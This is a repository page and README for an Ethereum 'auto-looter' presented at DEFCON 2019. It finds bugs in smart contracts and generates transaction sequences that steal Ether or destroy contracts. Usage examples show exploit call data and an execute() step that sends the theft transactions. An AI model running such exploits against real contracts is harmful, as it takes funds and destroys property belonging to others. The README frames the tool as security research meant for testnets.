muellerberndt/scrooge-mcetherface muellerberndt/scrooge-mcetherface

  • Stars
    star
    140
  • Rank 252,889 (Top 6 %)
  • Language
    Python
  • License
    MIT License
  • Created over 5 years ago
  • Updated about 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
muellerberndt/scrooge-mcetherface
github

muellerberndt

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Scrooge McEtherface is an Ethereum auto-looter that was presented at DEFCON 2019. It uses symbolic execution & SMT solving to generically generate exploit sequences that extract ETH from vulnerable smart contracts.

Scrooge McEtherface

Discord

Scrooge McEtherface is an Ethereum auto-looter based on Mythril. It exploits instances of Ether theft and self-destruction caused by various issues including integer arithmetic bugs, exposed initialization functions and others. Use at your own peril.

Installation

$ git clone https://github.com/b-mueller/scrooge-mcetherface
$ cd scrooge-mcetherface
$ pip install -r requirements.txt
$ cp config.ini.example config.ini

Python 3.5 or higher is required. Set up your RPC URL and Ethereum address in config.ini. The easiest way to test is using Ganache.

The symbolic_tx_count parameter sets a bound on the number of transactions being explored.

Usage

Start a session by running:

$ ./scrooge <address>

This will analyze the smart contract at the target address, output the vulnerabilites found and spawn a Python shell:

$ ./scrooge 0x3b1d02336205d1f22961c0f462abfe083e515921
Scrooge McEtherface at your service.
Analyzing 0x3B1D02336205D1F22961C0F462aBfE083E515921 over 2 transactions.
Found 2 attacks:

ATTACK 0: Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

ATTACK 1: The contract can be killed by anyone.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0xc96cd46f , call value: 0x0

Python 3.6.3 (default, Jan  8 2018, 08:49:07) 
(InteractiveConsole)
>>>

You now have access to a list of Raid objects, each of which represents a sequence of transactions that exploit a bug.

>>> r = raids[0]
>>> print(r.pretty()) 
Anyone can withdraw ETH from the contract account.
  0: Call data: 0xff9913e8 bebebebebebebebebebebebe7752B465f7452bF49B8A5f43977Efb261060D2Ef, call value: 0x0
  1: Call data: 0x6aba6fa1 , call value: 0x0

Use execute() to send the transactions to the blockchain:

>>>  r.execute()
Transaction sent successfully, tx-hash: 0x93f4a72d3ce897c4525a336249f32ae0704f6c0fed6b7b935801d5c7e68ca4b9. Waiting for transaction to be mined...
Transaction sent successfully, tx-hash: 0x21d1e77f6f629377ac227ec2e33f78b1d073c175826c0b161265121a74c2393b. Waiting for transaction to be mined...
True

This returns True if Ether was successfully withdrawn from the target account.

Support

No support for this tool exists whatsoever.

Important Notes

  • This is a weekend project that hasn't been extensively tested. Don't use it on mainnet.
  • Act responsibly and don't accidentally kill anyone else's contract.
  • Use only on testnet and at your own risk.

More Repositories

1

mini-agi

MiniAGI is a simple general-purpose autonomous agent based on the OpenAI API.
Python
2,729
star
2

android_app_security_checklist

Android App Security Checklist
831
star
3

frida-detection

A couple of methods for detecting Frida on Android.
C
412
star
4

awesome-mythx-smart-contract-security-tools

A curated list of resources and tools for the MythX smart contract security API
245
star
5

apkx

One-Step APK Decompilation With Multiple Backends
Python
235
star
6

smashing-smart-contracts

Compiled writings on EVM smart contracts security analysis.
HTML
168
star
7

laser-ethereum

Symbolic virtual machine for Ethereum
Python
67
star
8

sabre

Security analyzer for Solidity smart contracts. Uses the MythX smart contract security service.
JavaScript
59
star
9

darwin-gpt

A minimal self-replicating agent based on GPT-3.5/4
Python
58
star
10

obfuscation-metrics

Processes and metrics for assessing obfuscation effectiveness
56
star
11

rektosaurus

A test suite to check for client-side script injection on websites that display NFTs.
PostScript
53
star
12

defi-hacking-playground

All the money legos. This is not meant for production use.
Solidity
32
star
13

solfuzz

Check for assertion violations on Solidity smart contracts using grey-box fuzzing and symbolic analysis.
JavaScript
30
star
14

uncrackable_app

Mobile Crackmes
C
13
star
15

King-of-Pi

Who has the fastest algorithm for computing Pi?
Python
6
star
16

ladybug-love2d

A LÖVE port of the classic Arcade game Ladybug.
Lua
4
star
17

research2019

Links for the Research Meetup
4
star
18

vulnerable-truffle-project

JavaScript
3
star
19

mythril-ci

Mythril CI Docker
Python
3
star
20

mancala-deepq

Solving the ancient game of Mancala with deep Q learning
Python
2
star
21

memetic-natural-selection

The algorithm that creates all of Reality
1
star
22

mythx-api-curl

Shell scripts to run curl to interface with the MythX security platform (https://mythx.io)
Shell
1
star
23

solc-imports-test

1
star
24

ethereumanalysisbenchmarks.github.io

Web site to display Benchmark results see https://EthereumAnalysisBenchmarks.github.io
HTML
1
star
25

mythos-playground

Practice playground for smart contract security analysis with Mythos
1
star